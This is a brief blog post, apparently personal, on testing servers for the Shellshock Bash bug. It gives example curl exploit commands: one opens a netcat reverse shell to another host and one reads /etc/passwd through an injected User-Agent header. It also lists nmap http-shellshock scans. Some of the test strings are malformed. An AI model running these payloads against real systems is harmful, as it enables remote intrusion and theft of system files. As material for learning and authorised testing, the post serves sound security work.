Ricky Lin

Monday, November 28, 2022

Test Whether a Server Is Vulnerable to Shellshock Bug

Test Whether a Server Is Vulnerable to Shellshock Bug

The Shellshock Bug

env x=' () {:;};'

Exploiting Shellshock Bug

A substituted command is executed since the feature ignores the command specified by the user, and instead, it runs that which the ForceCommand defines.
The ignored commands from the user are put in the “SSH_ORIGINAL_COMMAND” environment variable. If the user’s default shell is Bash, the Bash shell will parse the value of the “SSH_ORIGINAL_COMMAND” environment variable on start-up and run the embedded commands.

Examples of Shellshock Exploit Commands

## 1
curl -H "X-Frame-Options: () {:;};echo;/bin/nc -e /bin/bash 192.168.y.y 443" 192.168.x.y/CGI-bin/hello.cgi

## 2
curl --insecure 192.168.x.x -H "User-Agent: () { :; }; /bin/cat /etc/passwd"

use nmap script to test for the vulnerability

nmap -sV -p- --script http-shellshock 192.168.x.x
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x

Improve this page

Terraform Provider 開發紀錄

The Art of Command Line

Table of Contents